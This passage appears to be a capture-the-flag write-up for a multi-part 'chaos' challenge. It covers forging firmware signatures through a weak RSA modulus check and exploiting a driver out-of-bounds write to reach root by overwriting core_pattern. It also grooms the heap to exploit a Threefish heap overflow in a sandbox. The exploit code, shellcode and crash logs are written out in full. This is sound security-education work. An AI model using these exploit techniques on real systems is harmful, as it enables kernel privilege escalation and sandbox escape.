+In short, we have to find a number $N'$ that is equal to the challenge's $N$ in the lowest 128 bytes such that $\phi(N')$ is easy to compute. Once we have $\phi(N')$ we can compute the private key and sign our own firmware. The intended solution is to look for a prime $N'$, since then $\phi(N') = N' - 1$, but we didn't think about this during the CTF and instead looked for a composite $N'$ that was easy to factor by setting bits above 1024.
+
+Our teammate Aaron eventually found that $N' = (N \mod 2^{1024}) + 2^{1034}$ works and factors to 13 * 691267 * 20502125755394762434933579089125449307897345968084091731229436353808955447773787435286551243437724264561546459801643475331591701959705793105612360650011316069145033629055595572330904990306691542449400499839249687299626423918040370229280752606812185791663127069532707770334540305571214081730144598191170073. This script produces a valid signature for an arbitrary binary:
+
+```py
+from pwn import *
+from hashlib import sha256
+from math import prod
+
+context.arch = "amd64"
+shellcode = read('shellcode.bin')
+
+header = p32(len(shellcode))
+header += p8(0x82)
+header += bytes.fromhex("0fff0ee945bd4176f55a40543b3666843a0d565c339e5d8969fcd7ca921cc303a1c8af16240c4d032d1931632b90996dd48aebacee307d3c57bc83375698ae7df90d10163edee9e067ce46e738092257dafb15b80fb65961900deffa9b59b57e472bf56be0d9f648ad6908f2553be13a9ea0cda24317756cba5142a95e21f9e000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
+
+factors = [13, 691267, 20502125755394762434933579089125449307897345968084091731229436353808955447773787435286551243437724264561546459801643475331591701959705793105612360650011316069145033629055595572330904990306691542449400499839249687299626423918040370229280752606812185791663127069532707770334540305571214081730144598191170073]
+phi=prod([i-1 for i in factors])
+dec=pow(0x10001,-1,phi)
+
+act = int.from_bytes(sha256(shellcode).digest(), "little")
+header += int.to_bytes(pow(act, dec, prod(factors)), 256, 'little')
+
+with open("firmware", "wb") as f:
+ f.write(header + shellcode)
+```
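+
+For comparison, the prime-modulus approach mentioned above can be sketched at toy scale. This is not the script we used during the CTF: `N_LOW`, `LOW_BITS`, and the helper names are made up for illustration, the primality test is plain trial division, and the digest is reduced modulo the tiny modulus (which is not needed with a real 1024+ bit modulus).
+
+```python
+from hashlib import sha256
+from math import gcd
+
+E = 0x10001
+LOW_BITS = 16        # toy stand-in for the 1024 bits that are actually checked
+N_LOW = 0xC0DF       # hypothetical low bits of the trusted modulus (odd)
+
+
+def is_prime(n):
+    """Trial division, fine for toy-sized numbers only."""
+    if n < 2:
+        return False
+    i = 2
+    while i * i <= n:
+        if n % i == 0:
+            return False
+        i += 1
+    return True
+
+
+def find_prime_modulus(n_low, low_bits):
+    """Search N' = n_low + k * 2**low_bits until N' is prime and E is invertible mod N' - 1."""
+    k = 1
+    while True:
+        candidate = n_low + (k << low_bits)
+        if is_prime(candidate) and gcd(E, candidate - 1) == 1:
+            return candidate
+        k += 1
+
+
+n_prime = find_prime_modulus(N_LOW, LOW_BITS)
+d = pow(E, -1, n_prime - 1)          # phi(N') = N' - 1 when N' is prime
+
+digest = int.from_bytes(sha256(b"firmware body").digest(), "little") % n_prime
+signature = pow(digest, d, n_prime)
+
+assert n_prime % (1 << LOW_BITS) == N_LOW      # low bits still match the trusted key
+assert pow(signature, E, n_prime) == digest    # the public-exponent check passes
+```
+
+The same idea should carry over to the real key size with a proper primality test, since only the bits above the checked prefix change between candidates.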
+
+Now that we can sign and load our own firmware, we only have to write some code that loads the flag using the `get_flag` syscall and makes it available to the client. The easiest way is to have our client allocate and map a buffer in the CHAOS memory, then send a request to CHAOS. The firmware can then copy the flag into the response buffer and exit. Since we hadn't yet finished reversing the interface between CHAOS and the driver, we just wrote a firmware that copies the flag everywhere in the CHAOS memory instead of finding the buffer that the client is using.
+
+```x86asm
+BITS 64
+DEFAULT rel
+
+dram_size equ 0x100000
+dram_start equ 0x10000000
+dram_end equ dram_start + dram_size
+
+.copy_loop2:
+ ; get flag
+ mov rdi, dram_start
+ mov eax, 0xC89FC
+ syscall
+
+ mov rax, dram_start + 0x50
+
+ .copy_loop:
+ mov rsi, dram_start
+ mov rdi, rax
+ mov rcx, 0x50
+ rep movsb
+
+ add rax, 0x50
+ cmp rax, dram_end
+ jb .copy_loop
+
+jmp .copy_loop2
+
+; exit
+mov edi, 0
+mov eax, 60
+syscall
+```
+
+```c
+struct request {
+ int field_0;
+ int field_4;
+ int field_8;
+ int field_c;
+ int field_10;
+ int field_14;
+ int out_size;
+};
+
+int main(void)
+{
+ int fd = open("/dev/chaos", O_RDWR);
+ assert(fd >= 0);
+
+ assert(ioctl(fd, 0x4008CA00, 0x1000) >= 0);
+
+ uint8_t *mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
+ assert(mem != MAP_FAILED);
+
+ struct request req = {
+ .field_0 = 1,
+ .field_4 = 0,
+ .field_8 = 32,
+ .field_c = 256,
+ .field_10 = 32,
+ .field_14 = 0,
+ .out_size = 256,
+ };
+ ioctl(fd, 0xC01CCA00, &req);
+
+ write(1, mem + 0x20, 0x50);
+
+ return 0;
+}
+```
+
+Flag: `hitcon{when the secure bootloader is not secure}`
+
+## Part 2: Kernel
+
+The flag for this part is in the VM, only readable to root. This means that we have to somehow exploit the kernel from our unprivileged client to become root. We control both the userspace client and the firmware, so we can attack the kernel from both sides.
+
+### DMA attack
+
+CHAOS uses a virtual PCI device. PCI is interesting from an attacker's point of view because it supports bus mastering, which means that devices can DMA to the host's memory. Pwning the kernel from such a device would be really easy because the device can read and write to all of physical memory. Unfortunately the virtual PCI device in QEMU doesn't use DMA, so it's impossible to DMA to the host memory from the device's firmware. All that the firmware can do is to write to its MMIO registers and its dedicated memory. Too bad.
+
+### CHAOS driver analysis
+
+We cannot directly attack the VM's kernel from the firmware, so it is very likely that we will need to find a bug in the driver and exploit it. We spent a few hours reversing the driver and understanding how it works and eventually found some bugs.
+
+Recall that the driver uses two ring buffers to communicate with CHAOS. The driver puts commands in the command queue and receives responses in the response queue. Here is the code that adds a new command to the queue:
+
+```c
+int chaos_mailbox_request(struct chaos_mailbox *mailbox, struct chaos_request *req)
+{
+ struct chaos_cmd_desc cmd_desc = {0};
+
+ // Generate a request ID.
+ int request_id = _InterlockedExchangeAdd(&mailbox->request_id, 1) + 1;
+
+ // Copy the request to the CHAOS memory.
+ int ret = chaos_dram_alloc(mailbox->chaos_state->dram_pool, 28LL, &dram_request);
+ if (ret != 0) {
+ return ret;
+ }
+
+ struct chaos_req *dram_req = dram_request.virt_addr;
+ memcpy(dram_req, req, sizeof(struct chaos_request));
+
+ struct chaos_state *chaos_state = mailbox->chaos_state;
+ uint64_t cmd_tail = chaos_state->csrs.virt_addr->cmd_tail;
+
+ mutex_lock(&mailbox->cmdq_lock);
+ uint64_t cmd_head = chaos_state->csrs.virt_addr->cmd_head;
+
+ // Check if the command queue is already full.
+ if ((cmd_head ^ cmd_tail) == 512) {
+ mutex_unlock(&mailbox->cmdq_lock);
+ chaos_dram_free(pool, &dram_request);
+ return -16;
+ }
+
+ cmd_desc.req_id = request_id;
+ cmd_desc.unk = 1;
+ cmd_desc.buf_offset = dram_request.phys_addr - pool->dram_io_map->phys_addr;
+ cmd_desc.size = 28;
+
+ // Add the request to the command queue.
+ memcpy(&mailbox->cmd_queue.virt_addr[cmd_head & 0xfffffffffffffdff], &cmd_desc, sizeof(cmd_desc));
+ chaos_state->csrs.virt_addr->cmd_head = (cmd_head + 1) & 0x3FF;
+ mutex_unlock(&mailbox->cmdq_lock);
+
+ // Set the response to pending in the response queue.
+ int resp_index = request_id & 0x1FF;
+ mailbox->responses[resp_index].result = -100;
+
+ // Send an interrupt to the device.
+ chaos_state->csrs.virt_addr->device_irq = 1;
+
+ _cond_resched();
+ uint32_t result = mailbox->responses[resp_index].result;
+ bool timed_out = false;
+
+ // Wait for the request to complete.
+ if (result == -100) {
+ long time_left = 2000;
+
+ struct wait_queue_entry wq_entry;
+ init_wait_entry(&wq_entry, 0);
+
+ prepare_to_wait_event(&mailbox->waitq, &wq_entry, 2LL);
+
+ // Wait up to 2000 jiffies.
+ result = mailbox->responses[resp_index].result;
+ while (time_left != 0 && result == -100) {
+ time_left = schedule_timeout(time_left);
+ prepare_to_wait_event(&mailbox->waitq, &wq_entry, 2LL);
+ result = mailbox->responses[resp_index].result;
+ }
+
+ timed_out = time_left == 0 && result == -100;
+ finish_wait(&mailbox->waitq, &wq_entry);
+ }
+
+ chaos_dram_free(pool, &dram_request);
+
+ if (timed_out) {
+ return -110;
+ }
+
+ if ((result & 0x80000000) != 0) {
+ dev_err(mailbox->chaos_state->device, "%s: fw returns an error: %d", "chaos_mailbox_request", result);
+ return -71;
+ }
+
+ req->out_size = result;
+
+ return 0;
+}
+```
+
+This function can write out of bounds of the command queue (which has 512 entries) if the head index of the command queue is 1024 or greater. At first glance it looks like this can never happen because the driver always ANDs the head index with 0x3FF when incrementing it and then clears bit 9 (mask `0xfffffffffffffdff`) when accessing the queue, so the slot number should always be at most 511. However the driver is not the only component that can modify the head index. The firmware also has access to it and can set it to arbitrary values. The following PoC sets the index to a very big value and crashes the kernel with a general protection fault:
+
+```c
+int main(void)
+{
+ int fd = open("/dev/chaos", O_RDWR);
+ assert(fd >= 0);
+
+ assert(ioctl(fd, 0x4008CA00, 0x1000) >= 0);
+
+ uint8_t *mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
+ assert(mem != MAP_FAILED);
+
+ struct request req = {
+ .field_0 = 1,
+ .field_4 = 0,
+ .field_8 = 32,
+ .field_c = 256,
+ .field_10 = 32,
+ .field_14 = 0,
+ .out_size = 256,
+ };
+ ioctl(fd, 0xC01CCA00, &req);
+ ioctl(fd, 0xC01CCA00, &req);
+
+ return 0;
+}
+```
+
+```x86asm
+BITS 64
+DEFAULT rel
+
+csr_start equ 0x10000
+
+; overwrite the command queue's head pointer.
+mov rax, 0x4141414141414141
+mov [csr_start + 0x50], rax
+
+; exit
+mov edi, 0
+mov eax, 60
+syscall
+```
+
+```
+[ 2.964179] general protection fault, probably for non-canonical address 0x505019505070504d: 0000 [#1] SMP NOPTI
+[ 2.965393] CPU: 0 PID: 78 Comm: run Tainted: G O 5.15.6 #5
+[ 2.966232] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g155821a1990b-prebuilt.qemu.org 04/01/2014
+[ 2.967558] RIP: 0010:chaos_mailbox_request+0x159/0x2e0 [chaos]
+[ 2.968249] Code: 48 89 d0 48 83 c2 01 80 e4 fd c7 44 24 2c 1c 00 00 00 81 e2 ff 03 00 00 4c 8d 04 40 4a 8d 04 80 4c 8b 44 24 23 48 03 44 24 10 <4c> 89 00 44 8b 44 24 2b 44 89 40 08 44 0f b6 44 24 2f 44 88 40 0c
+[ 2.970407] RSP: 0018:ffffc900001b7df8 EFLAGS: 00010207
+[ 2.971016] RAX: 505019505070504d RBX: ffffc900001b7ec4 RCX: 0000000000000002
+[ 2.971841] RDX: 0000000000000142 RSI: 0000000000000100 RDI: ffff888003f39058
+[ 2.972662] RBP: ffff888003eff2e8 R08: 0040000100000002 R09: ffffc90000204000
+[ 2.973483] R10: 000000000000003c R11: 00000000000000ca R12: 0000000000000000
+[ 2.974303] R13: 4141414141414141 R14: ffff888003f39028 R15: ffff888003f421a8
+[ 2.975126] FS: 0000000000408718(0000) GS:ffff88801f200000(0000) knlGS:0000000000000000
+[ 2.976047] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+[ 2.976704] CR2: 000000000042eb90 CR3: 0000000003f68000 CR4: 00000000000006f0
+[ 2.977526] Call Trace:
+[ 2.977820]
+[ 2.978071] ? selinux_file_ioctl+0x16f/0x210
+[ 2.978582] chaos_fs_ioctl+0x11c/0x230 [chaos]
+[ 2.979108] __x64_sys_ioctl+0x7e/0xb0
+[ 2.979560] do_syscall_64+0x3b/0x90
+[ 2.979981] entry_SYSCALL_64_after_hwframe+0x44/0xae
+```
+
+The interrupt handler, which reads the result queue, has the same bug but this time it reads out of bounds instead of writing:
+
+```c
+void chaos_mailbox_handle_irq(struct chaos_mailbox *mailbox)
+{
+ struct chaos_state *chaos_state = mailbox->chaos_state;
+ struct chaos_resp_desc *result_queue = mailbox->output_queue.virt_addr;
+ raw_spin_lock(&mailbox->spinlock);
+ uint64_t i = chaos_state->csrs.virt_addr->result_head;
+ while (i != chaos_state->csrs.virt_addr->result_tail) {
+ desc = &result_queue[i & 0xfffffffffffffdff];
+ i = (i + 1) & 0x3FF;
+ id = desc->req_id;
+ result = desc->result;
+ resp = &mailbox->responses[desc->req_id & 0x1FF];
+ resp->req_id = id;
+ resp->result = result;
+ }
+ chaos_state->csrs.virt_addr->result_head = i;
+ spin_unlock(&mailbox->spinlock);
+ _wake_up(&mailbox->waitq, 3, 1, 0);
+}
+```
+
+This gives us an out of bounds read/write, which should be enough to completely own the kernel.
+
+### Exploit
+
+The bug we found gives us an out of bounds write relative to the address of the command queue. The index is 64-bit so we can write to almost any address (bit 9 of the index is cleared before accessing the queue). We can write a 13-byte command descriptor containing predictable data.
+
+```c
+struct __attribute__((packed)) chaos_input_rb_desc {
+ // Set by the driver, but predictable.
+ uint16_t req_id;
+ // Always 0
+ uint16_t gap;
+ // Always 1
+ uint8_t unk;
+ // Set by the driver, value between 0 and 0x100000
+ uint32_t buffer_offset;
+ // Always 28
+ uint32_t buffer_size;
+};
+```
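+
+To get a feeling for which bytes end up in memory, the descriptor can be packed with Python's `struct` module. This is an illustrative sketch: the helper name and the example values for `req_id` and `buffer_offset` are ours.
+
+```python
+import struct
+
+# "<" means little-endian without padding:
+# u16 req_id, u16 gap, u8 unk, u32 buffer_offset, u32 buffer_size
+DESC_FORMAT = "<HHBII"
+
+
+def pack_desc(req_id, buffer_offset):
+    """Build the bytes the driver would write for one command descriptor."""
+    return struct.pack(DESC_FORMAT, req_id, 0, 1, buffer_offset, 28)
+
+
+desc = pack_desc(req_id=2, buffer_offset=0x1000)   # example values, not from the challenge
+print(struct.calcsize(DESC_FORMAT), desc.hex())
+```
+
+Only the first two bytes and the four offset bytes vary between requests; the remaining seven bytes are fixed.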
+
+To get an idea of where our buffer could be and what could be around it we had a look at the kernel's documentation, which includes a [map of the kernel's address space on x86](https://www.kernel.org/doc/Documentation/x86/x86_64/mm.txt). The command queue is located in the CHAOS device memory, and the driver uses `devm_ioremap` to map that region into virtual memory. `ioremap` allocates virtual memory from the vmalloc region (`0xffffc90000000000-0xffffe90000000000` on x86_64), so the ring buffer will be somewhere in that region. After looking around in GDB for a while we noticed that the kernel stack of our process is also located there. This makes sense, because the kernel's stacks are also [allocated](https://elixir.bootlin.com/linux/latest/source/kernel/fork.c#L246) from the vmalloc region by default. Even more importantly, it looked like the kernel's stack is at a constant, or at least predictable, offset from the command queue. This means that we should be able to reliably overwrite a specific value saved on the stack with controlled data without needing any leaks.
+
+There are many ways to exploit this. The target VM has no SMEP and no SMAP, which means that we can redirect any kernel data and code pointers to memory controlled by us in userspace. With some trial and error to figure out which offsets would overwrite what value, we found that offset `0x13b13b13b13ad88c` reliably overwrites a saved `rbp` on the kernel's stack. This value depends on what other `vmalloc` allocations the kernel did before running the exploit so it's somewhat specific to the setup we used but it works reliably. The overwrite clears the top 16 bits of the saved `rbp`, which redirects it to a userspace address. We can mmap this address and gain control of the kernel's stack as soon as the kernel executes a `leave` instruction. We then only have to fill the fake stack with a pointer to some shellcode.
+
+```c
+static void alloc_rbp(size_t offset) {
+ uint64_t *rbp = mmap((void *)(0x00000003001cf000 + 0x040000000*offset), 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);
+ assert(rbp != MAP_FAILED);
+ for (size_t i = 0; i < 0x1000 / 8; i++) {
+ rbp[i] = (uint64_t)&pwn_kernel;
+ }
+}
+```
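+
+The huge index used above makes more sense once it is converted to a byte offset. The driver multiplies the index by the 13-byte descriptor size, and that multiplication wraps around at 64 bits. The following sketch (our own helper, using only values quoted in this section) shows where the write lands relative to the start of the command queue.
+
+```python
+MASK64 = (1 << 64) - 1
+DESC_SIZE = 13
+
+
+def byte_offset(head):
+    """Signed byte offset from the queue base for an unchecked head index."""
+    raw = ((head & ~0x200) * DESC_SIZE) & MASK64   # pointer arithmetic wraps at 64 bits
+    return raw - (1 << 64) if raw >> 63 else raw
+
+
+print(hex(byte_offset(0x13B13B13B13AD88C)))
+```
+
+The result is `-0x300e4`: the index is close to 2^64 / 13, so the product wraps around and the write lands roughly 192 KiB below the command queue, where the kernel stack happened to be in our setup.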
+
+The shellcode is pretty simple: it reads the IA32_LSTAR MSR, which contains the address of the system call handler, to recover the base address of the kernel and then overwrites `core_pattern` with the path to our exploit. It then executes `swapgs; sysret` to return to userspace. The exploit returns to userspace at an invalid address and crashes, which runs the core dump handler, which is now our exploit itself. The core dump handler runs as root, so our exploit can read the flag and print it to the serial console.
+
+```x86asm
+BITS 64
+DEFAULT rel
+global pwn_kernel
+
+kernel_base equ 0xffffffff81000000
+syscall_handler_off equ 0xffffffff81c00000 - kernel_base
+core_pattern_off equ 0xffffffff82564060 - kernel_base
+
+pwn_kernel:
+ ; read IA32_LSTAR, which contains the address of the syscall handler
+ mov ecx, 0xc0000082
+ rdmsr
+ shl rdx, 32
+ or rax, rdx
+
+ mov rbx, syscall_handler_off
+ sub rax, rbx
+ ; rbx = kernel base
+ mov rbx, rax
+
+ mov rax, core_pattern_off
+ mov rcx, rbx
+ ; rcx = core_pattern
+ add rcx, rax
+
+ ; overwrite core_pattern
+ mov rbx, '|/home/c'
+ mov [rcx], rbx
+ mov rbx, 'haos/run'
+ mov [rcx + 8], rbx
+ xor ebx, ebx
+ mov [rcx + 16], rbx
+
+ ; return to userspace and crash
+ xor ecx, ecx
+ mov r11, 0x002
+ swapgs
+ sysret
+```
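
The address arithmetic done by the shellcode can be mirrored in plain C as a quick sanity check. This is only a sketch: the three link-time addresses are copied from the listing above, while the helper names (`kernel_base_from_lstar`, `core_pattern_addr`, `pack8`) are made up for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Link-time addresses copied from the shellcode listing. */
#define KERNEL_BASE     0xffffffff81000000ULL
#define SYSCALL_HANDLER 0xffffffff81c00000ULL
#define CORE_PATTERN    0xffffffff82564060ULL

/* Runtime kernel base, given the value read from IA32_LSTAR. */
uint64_t kernel_base_from_lstar(uint64_t lstar) {
    return lstar - (SYSCALL_HANDLER - KERNEL_BASE);
}

/* Runtime address of core_pattern for a given runtime kernel base. */
uint64_t core_pattern_addr(uint64_t base) {
    return base + (CORE_PATTERN - KERNEL_BASE);
}

/* Pack up to 8 characters into the little-endian qword that a
 * `mov rbx, '...'` immediate holds (hypothetical helper). */
uint64_t pack8(const char *s) {
    uint64_t v = 0;
    size_t n = strlen(s);
    if (n > 8)
        n = 8;
    for (size_t i = 0; i < n; i++)
        v |= (uint64_t)(unsigned char)s[i] << (8 * i);
    return v;
}
```

Whatever the KASLR slide is, it cancels out: the same slide is added to both the syscall handler and `core_pattern`, so one MSR read is enough to locate the target.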
+
+```c
+int main(int argc, char* argv[])
+{
+ if (getuid() == 0) {
+ system("cat /flag > /dev/ttyS0");
+ return 0;
+ }
+ /* ... */
+}
+```
+
+Flag: `hitcon{so this is how we attack kernel from a device}`
+
+## Part 3: Sandbox
+
+### Analysis
+
+The flag for part 3 is also a file outside the sandbox. However, unlike in part 1, there is no system call that copies the flag into the CHAOS memory for us. The sandbox only opens the file that contains the third flag, but then doesn't do anything with it. Clearly this means that we must somehow pwn the sandbox and read the contents of the file into shared memory where our firmware can access them. As we mentioned before, the sandbox has some system calls that let the chip perform some cryptographic operations on data supplied by the firmware. More specifically, the sandbox implements the following:
+
+* MD5
+* SHA256
+* AES encrypt/decrypt
+* RC4 encrypt/decrypt
+* Blowfish encrypt/decrypt
+* Twofish encrypt/decrypt
+* Threefish encrypt/decrypt
+
+Except for MD5 and SHA256, all of these operations also need a key. The client can use the `add_key` and `delete_key` system calls to add and remove keys from the sandbox's key storage. The key storage is a `std::map` (implemented as a search tree), which maps a key ID to the key data.
+
+Now, except for MD5, SHA256 and RC4 all of the algorithms implemented in the sandbox are block ciphers, which take a fixed-size block of input and produce a block of output having the same size as the input. The block size is usually a fixed value chosen by the designers of the algorithm.
+
+Consider now the function that implements Threefish encryption, which has a block size of 32 bytes:
+
+```c
+void threefish_encrypt(struct buffer *output, struct buffer *key, struct buffer *input)
+{
+ if (key->size != 32) {
+ _exit(2);
+ }
+
+ size_t size = input->size;
+ if ((size & 7) != 0 || size > 0x20) {
+ _exit(2);
+ }
+
+ output->data = NULL;
+ output->size = size;
+
+ if ((unsigned int)(size - 1) > 0xFFFFF) {
+ _exit(2);
+ }
+
+ uint8_t *out = new uint8_t[size];
+ output->data = out;
+ do_threefish_encrypt(key->data, key->size, input->data, out);
+}
+```
+
+While the function checks that the size of the input is not bigger than the block size, it doesn't check that it's exactly equal to the block size. On top of that, it allocates an output buffer whose size is the same as the size of the input, rather than a fixed-size buffer. This means that the encryption can write out of bounds if we pass it an input buffer that is smaller than 32 bytes. All block ciphers have this bug, but it's only exploitable with Threefish because it's the only cipher with a block size greater than 24 bytes, which is the smallest usable buffer returned by glibc's malloc. This bug gives us an 8-byte out-of-bounds read and an 8-byte out-of-bounds write on a heap chunk of size 24 (the input data is also assumed to be 32 bytes).
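
To make the numbers concrete, here is a small sketch that replays the two size checks from `threefish_encrypt` and computes how far a 32-byte block operation reaches past the chunk. It assumes 64-bit glibc chunk rounding (8-byte size header, 16-byte alignment, 0x20 minimum chunk); the function names are hypothetical.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

#define THREEFISH_BLOCK 32u

/* Mirrors the two input-size checks in threefish_encrypt above. */
bool size_accepted(size_t size) {
    if ((size & 7) != 0 || size > 0x20)
        return false;
    if ((unsigned int)(size - 1) > 0xFFFFF) /* rejects size == 0 */
        return false;
    return true;
}

/* Usable bytes of the chunk backing a request.
 * Assumption: 64-bit glibc rounding rules. */
size_t usable_size(size_t request) {
    size_t chunk = (request + 8 + 15) & ~(size_t)15;
    if (chunk < 0x20)
        chunk = 0x20;
    return chunk - 8;
}

/* Bytes a full-block read or write touches beyond the chunk's usable area. */
size_t oob_bytes(size_t size) {
    size_t usable = usable_size(size);
    return usable < THREEFISH_BLOCK ? THREEFISH_BLOCK - usable : 0;
}
```

Under these assumptions the accepted sizes are 8, 16, 24 and 32, and the first three all end up in a chunk with 24 usable bytes, so the last 8 bytes of the block always overlap the size field of the following chunk.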
+
+Ok, so we have a heap overflow and overread, how can we exploit this? Fortunately, if we do overflow, we do so directly into the size field of the next chunk. Therefore, our goal was to overflow the size field of a small chunk with a large size. However, there were a bunch of complications before achieving this.
+
+The biggest issue we faced is that neither encryption nor decryption (directly) allows for a controlled overflow. Encryption, of course, leads to mostly gibberish in the overflowed area. Furthermore, since our input also has to be smaller than 32 bytes, part of the encryption input comes from the next heap chunk! This also makes it nontrivial to get a controlled overflow with decryption, since we do not control the part of the encrypted input that comes from the next chunk.
+
+The intended solution here was to use crypto to your advantage and figure out a way to make known but uncontrolled input also decrypt to something you want. However, we found a much easier approach that did not involve pinging our crypto people on discord ;).
+
+We first present the heap setup we want to have, then how we actually achieved it.
+The basic setup we need is the following, where the three separate parts of the heap can be anywhere.
+
+![](chaos2.jpg)
+
+
+The sizes shown are the actual chunk sizes used by malloc (so rounded up to the nearest 0x10).
+Furthermore, except for the sizes of the input / output chunks, the other sizes are not particularly specific.
+However, we do need `sizeof(L)` to be much larger than `sizeof(S)`. The goal is now to have roughly the following happen [^1]:
+
+```c
+void* I_E = malloc(0x20);
+void* O_E = malloc(0x20);
+void* I_D = O_E;
+void* O_D = malloc(0x20);
+threefish_encrypt(I_E, O_E);
+threefish_decrypt(I_D, O_D);
+```
+
+In particular, the purpose of the different chunks are as follows:
+
+- $I_E$: input to the threefish encryption using overflow. The encryption will read the size of the next chunk $L$ oob, as the last 8 bytes of input.
+- $O_E$ / $I_D$: output of the threefish encryption, but then also input of the threefish decryption. During encryption, the size of the next chunk will be overwritten. During decryption, the size of the next chunk will be read oob, as the last 8 bytes of input.
+- $O_D$: output of the threefish decryption. The size of the next chunk will be overwritten, with the last 8 bytes of output.
+- $L$: A large chunk. We will overwrite the size of $S$, with this size.
+- $D$: A chunk that is never freed. Since we corrupt the size with the encryption, we do not want to free it, otherwise malloc is unhappy.
+- $S$: A small chunk. Target for our overwrite.
+
+This works out well: since we do not change the output of our encryption before decrypting it, the output of the decryption must be the same as our initial input. Since the last 8 bytes of the initial input were a large size, the small size of $S$ will be overwritten with this large size. If we now allocate $S$ and free it again, it will end up in the tcache for a much larger size than it should. We can then allocate a chunk of size $0x150$ and get back $S$. This gives us a fully controlled overflow of a much larger area of the heap.
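
The effect of the smashed size field on bin selection can be sketched as follows. The formulas reflect our understanding of how 64-bit glibc rounds requests and picks a tcache bin (0x20 minimum chunk, 0x10 granularity, low three bits of the size field used as flags); the function names are hypothetical and this is not glibc's actual code.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Chunk size malloc uses for a request (assumption: 64-bit glibc). */
size_t chunk_size_for(size_t request) {
    size_t chunk = (request + 8 + 15) & ~(size_t)15;
    return chunk < 0x20 ? 0x20 : chunk;
}

/* tcache bin a chunk is put into on free, derived from its size field. */
size_t tcache_index(uint64_t size_field) {
    uint64_t size = size_field & ~(uint64_t)7; /* drop the flag bits */
    return (size_t)((size - 0x20) / 0x10);
}
```

With these rules, `malloc(0x50)` yields a 0x60 chunk that normally belongs to bin 4. Once its size field reads 0x161, `free` files it into bin 20, which is the bin a later `malloc(0x150)` is served from.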
+
+This whole procedure is shown in the image below:
+
+![](chaos3.jpg)
+
+So our goal is now clear, we need the specific heap layout and allocations mentioned before.
+But how do we get there?
+
+There are two major pain points in trying to achieve this.
+Firstly, the heap is not in a clean state when we start our exploit, since the firmware loading also uses the heap already.
+Secondly, there are no good malloc and free primitives. To get the heap into a certain state, ideally we would be able to malloc and free arbitrary sizes. The best primitive we found was the addition and removal of keys. While it allows us to malloc an arbitrarily sized chunk and free it later, it also has a major drawback: the malloc of the size we control happens in between a `malloc(0x10)` and a `malloc(0x30)`. The former acts as a kind of wrapper around our malloc'd buffer, the latter is the node in a red-black tree. This is because the keys are stored in a `std::map`.
+
+Astute readers will have noticed that the wrapper struct is actually of the same size as our target buffers to overflow.
+In fact, both of these pain points can help us out in certain ways.
+
+We will now show the heap feng shui of our exploit, then explain why the different allocations work and how they help us towards our goal. But first, we explain the `do_malloc` and `do_free` functions. These correspond to adding and removing a key respectively. As such, a simplified view of these is basically:
+
+```c
+size_t do_malloc(size_t size) {
+ void* buffer = malloc(0x10); // wrapper struct
+ void* key_buf = malloc(size); // key data, size controlled by us
+ void* tree_node = malloc(0x30); // std::map node
+ size_t key_id = curr_id;
+ curr_id++;
+ keys[key_id] = (buffer, key_buf, tree_node);
+ return key_id;
+}
+
+void do_free(size_t key_id) {
+ (buffer, key_buf, tree_node) = keys[key_id];
+ free(tree_node);
+ free(key_buf);
+ free(buffer);
+}
+```
+
+Now our heap feng shui is written as:
+
+```c
+size_t first = do_malloc(0x80);
+
+size_t inp_prepare = do_malloc(0x150);
+size_t dont_free = do_malloc(0x70);
+size_t small = do_malloc(0x50);
+
+size_t reserved_for_later = do_malloc(0x80);
+size_t reserved_for_later2 = do_malloc(0x80);
+
+do_free(dont_free);
+do_free(first);
+size_t dont_free2 = do_malloc(0x70);
+size_t dont_free_begin = do_malloc(0x90);
+do_free(small);
+do_free(dont_free_begin);
+do_free(inp_prepare);
+```
+
+Since `do_malloc` first allocs a chunk of size 0x20, then our desired size, we can use it as a primitive for achieving the three parts of the heap we need, as long as the two mallocs happen from a contiguous region. Thankfully, the firmware was allocated as a large heap chunk and after freeing it, put in the unsorted bin. Therefore, as long as our allocation size's tcache is empty, the malloc happens contiguously from this unsorted bin. Hence, our chunks from before can be identified:
+
+- $I_E$ ` = inp_prepare.buffer`
+- $O_E$ / $I_D$ ` = dont_free.buffer = dont_free_begin.buffer`
+- $O_D$ ` = small.buffer`
+- $L$ ` = inp_prepare.key_buf`
+- $D$ ` = dont_free.key_buf = dont_free2.key_buf`
+- $S$ ` = small.key_buf`
+
+This also explains the very first allocation. It is done to remove the single 0x20 chunk currently in the tcache.
+`inp_prepare` then corresponds to our first heap part, the first input buffer and the large chunk.
+`dont_free` corresponds to the second heap part, while `small` to the third.
+Both `reserved_for_later` use a key_buf chunk on the tcache, while the tree_node will be allocated just after our small chunk.
+This will be our target for overwriting with the controlled overflow later.
+
+Finally, we have to do some freeing to get our tcache in the correct order. In the end, we would like to have the following tcache for 0x20:
+
+```
+head -> inp_prepare.buffer -> dont_free.buffer -> small.buffer
+```
+
+To this end, we first swap the buffer struct used for `dont_free` and `first`. Otherwise, we would have to free `dont_free.key_buf`, which we do not want! For that, we first free it temporarily, leading to the following tcache 0x20:
+
+```
+head -> first.buffer -> dont_free.buffer
+```
+
+Furthermore, `dont_free.key_buf` is the head of tcache 0x70. Therefore, `do_malloc(0x70)`, will use `first.buffer` as the buffer, and `dont_free.key_buf` as its key_buf. Since we never touch the result of this malloc (`dont_free2`) again, we can be safe that `dont_free.key_buf` (or as named above $D$) is never freed! Lastly, `dont_free_begin.buffer` now points to `dont_free.buffer` and hence the last three frees achieve exactly the tcache layout we want.
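
The buffer swap is easier to follow when replayed on a toy model of the 0x20 bin. The sketch below tracks only the 0x20-sized `buffer` chunks and treats the bin as a plain LIFO stack; the chunk labels and helper names are invented for this illustration, and the model assumes that exactly one stale 0x20 chunk sits in the bin at the start, as described above.

```c
#include <assert.h>
#include <stddef.h>

/* Labels for the 0x20-sized `buffer` chunks (hypothetical names). */
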